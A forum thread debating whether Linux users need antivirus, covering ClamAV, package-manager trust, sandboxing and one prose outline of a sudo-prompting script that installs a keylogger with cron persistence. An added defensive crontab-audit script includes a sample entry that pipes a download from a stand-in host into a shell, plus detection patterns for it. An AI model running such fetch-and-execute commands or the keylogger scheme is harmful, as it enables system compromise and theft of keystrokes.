ClamAV?
Please stop pretending Linux was immune to viruses. A virus can do many things, perhaps even more on Linux than it could on Windows.
Not running an AV only works because viruses nowadays are much less common, especially if you follow some best practices (Adblock, no piracy sites, recognize sketchy stuff).
I recently learnt you can fully delete your root account. Can that fully deter viruses? (Assuming viruses need root access to cause damage)
Can’t run a Linux virus if your Linux doesn’t run
A single .sh file with exec permission that asks for sudo will easily download appimage keyloggers and then set a cron job to run it every X time to keep it alive and sends it all to whatever remote location. Or whatever else you let the appimage do.
95% of regular users will double click that, and then write their pass in the popup without blinking twice and that will work in most Linux systems.
Most viruses don’t target Linux, sure, but that’s wishful thinking. Always be careful with what you run.
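From the defender's side, the cron persistence described in the comment above is cheap to check for. The following is an added example, not part of the original comment: it assumes the user-crontab format printed by `crontab -l`, and the sample entries, paths and rule list are constructed for illustration.

```python
import re

# Constructed sample of a user crontab (`crontab -l` output); not from the thread.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/updatedb
*/5 * * * * /home/alice/.cache/.helper.AppImage --quiet
@reboot curl -s http://example.invalid/x.sh | sh
30 2 * * 0 /usr/local/bin/backup.sh
"""

# Heuristic rules (assumptions chosen for this example, not a complete list).
RULES = [
    ("runs from a user-writable path",
     re.compile(r"(^|\s)(/home/|/tmp/|/var/tmp/|/dev/shm/|~/)")),
    ("executes an AppImage", re.compile(r"\.appimage\b", re.IGNORECASE)),
    ("pipes a download into a shell",
     re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")),
    ("references a hidden file or directory", re.compile(r"/\.[^/\s]+")),
]

def command_of(line):
    """Return the command part of a user-crontab line, or None if there is none."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if re.match(r"[A-Za-z_][A-Za-z0-9_]*\s*=", line):  # e.g. MAILTO=root
        return None
    # "@reboot cmd" has one schedule field, "m h dom mon dow cmd" has five.
    n_sched = 1 if line.startswith("@") else 5
    fields = line.split(None, n_sched)
    return fields[n_sched] if len(fields) > n_sched else None

def audit(crontab_text):
    """Return (line_number, command, reasons) for every entry a rule matches."""
    findings = []
    for number, line in enumerate(crontab_text.splitlines(), 1):
        command = command_of(line)
        if command is None:
            continue
        reasons = [name for name, pattern in RULES if pattern.search(command)]
        if reasons:
            findings.append((number, command, reasons))
    return findings

if __name__ == "__main__":
    for number, command, reasons in audit(SAMPLE_CRONTAB):
        print(f"line {number}: {command}\n    " + "; ".join(reasons))
```

A match is a prompt to look at the entry, not proof of malware; system crontabs under `/etc` carry an extra user field and would need a different split.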
An antivirus is mostly just a blacklist of known malware. Sometimes heuristics are used such as ‘this piece of software isn’t installed on many PCs, and it appears to be doing shady stuff like, monitoring keystrokes or listening to your microphone’. But unless your antivirus is actually sentient there’s no way for it to really distinguish between a chat application that listens to your microphone so you can talk to your friends / monitor your keystrokes to know when you’ve hit the push-to-talk key, and a piece of actual malware that intends to spy on you and blackmail you.
What you have with a package manager is a whitelist of programs that have been selected by your distro maintainers. Is it completely impossible for someone to sneak malware into a distro’s repository? No, but it’s a lot easier to maintain a list of known good software than it is to maintain a list of known bad software. And in that situation your antivirus isn’t going to help you anyway, since the people maintaining its malware list aren’t going to magically know that something is malware before the distro maintainers do.
So, generally, just using your package manager instead of running random shit you find online is going to be a lot better than any antivirus. With things like Wayland and Flatseal becoming more common we’re heading towards a situation where fine-grained per-package permissions will become the standard way distros do things, making antivirus even more unnecessary.
We should have done that a long time ago, as the security model of ‘any program you run can do anything you can by default’, then blacklist the ones that inevitably abuse that privilege, is completely backwards.
What’s the difference between that and a walled garden like apple?
In addition to what groet said, I’ll add that this is a little bit like asking “what’s the difference between a public library and Amazon?”.
Yes, there are other public libraries you could go to if the one you subscribe to didn’t have something you wanted or ‘went bad’ somehow, but the most important difference is you don’t have an antagonistic relationship with your public library. Your public library doesn’t have a financial incentive to try to trap you or screw you over.
Linux has viruses. Always protect yourself…
ClamAV in the corner, visibly annoyed
It’s powerful but sadly not realtime
Oh, not true anymore:
https://docs.clamav.net/manual/Usage/Scanning.html#on-access-scanning
A few years ago I found a text (probably as image) where somebody ‘tried’ to run a virus on Linux. It went something like this:
Wanted to install a virus on Ubuntu, but it was only available as an AUR package. Tried converting. Didn’t work … Tried make virus, but didn’t work. Upgraded cmake, tried again, but some libraries were missing. Tried installing libraries, but they were very outdated and I couldn’t find proper versions.
Checked the source to see what the libs were doing and replaced them.
and so on.
Does someone know what I’m talking about and possibly has the source?